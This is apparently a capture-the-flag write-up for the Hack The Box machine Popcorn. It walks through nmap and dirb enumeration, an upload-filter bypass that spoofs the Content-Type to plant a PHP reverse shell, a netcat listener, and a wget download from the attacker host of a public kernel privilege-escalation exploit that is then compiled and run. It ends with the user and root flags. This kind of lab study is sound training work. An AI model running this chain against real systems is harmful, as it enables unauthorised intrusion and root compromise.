POPCORN 10.10.10.6 Write Up
Machine Created by ch4p

Tools Used for Enumeration:
1. nmap
2. dirb

Tools Used for Exploitation:
1. netcat

Steps for primary enumeration:
1. First we run nmap (the Network Mapper) against the box IP. The -A switch turns on version detection, OS detection and default scripts, so the output lists the open ports and the services behind them. On Popcorn there are two: port 22 (SSH) and port 80 (HTTP).
Command used: nmap -A 10.10.10.6
2. SSH on port 22 looks like a current version with nothing obvious to attack, so attention moves to the web server. Running dirb against port 80 returns several directories, one of which stands out: http://10.10.10.6/torrent/
Command used: dirb http://10.10.10.6
Steps to get user.txt:
1. Register at http://10.10.10.6/torrent/users/index.php?mode=register with any username and password, then log in.
2. Go to http://10.10.10.6/torrent/torrents.php?mode=upload and upload a valid torrent file.
3. Open the new torrent's edit page, which offers an image upload. Capture that upload request in Burp, send it to Repeater and replace the image with a PHP reverse shell. The upload filter trusts the client-supplied Content-Type of the file part instead of inspecting the bytes, so keep the .php filename and set the part's Content-Type to an image type such as image/png. Start a netcat listener on the port the shell connects back to before triggering it.
4. Go to the upload directory http://10.10.10.6/torrent/upload/ (found in the dirb results) and click the uploaded PHP file to get the shell.
5. Upgrade the raw shell to a PTY with python: python -c 'import pty; pty.spawn("/bin/sh")'
Use cat /home/george/user.txt to print the user flag.
Steps to get root.txt:
1. uname -a prints the kernel version, which has a public local privilege escalation. Exploit: https://www.exploit-db.com/exploits/15704
2. Host the exploit from the attacking machine with "python3 -m http.server 1337" and fetch it on the box with "wget http://10.10.14.5:1337/15704.c" (the port in the URL has to match the one http.server is listening on).
3. Compile it on the box with "gcc 15704.c -o exploit" and make it executable with "chmod 777 exploit" (chmod +x is enough; 777 also makes it world-writable). Run it with "./exploit" and read the root flag with "cat /root/root.txt".
Flags:
1. user.txt flag: 5e36a919398ecc5d5c110f2d865cf136
2. root.txt flag: f122331023a9393319a0370129fd9b14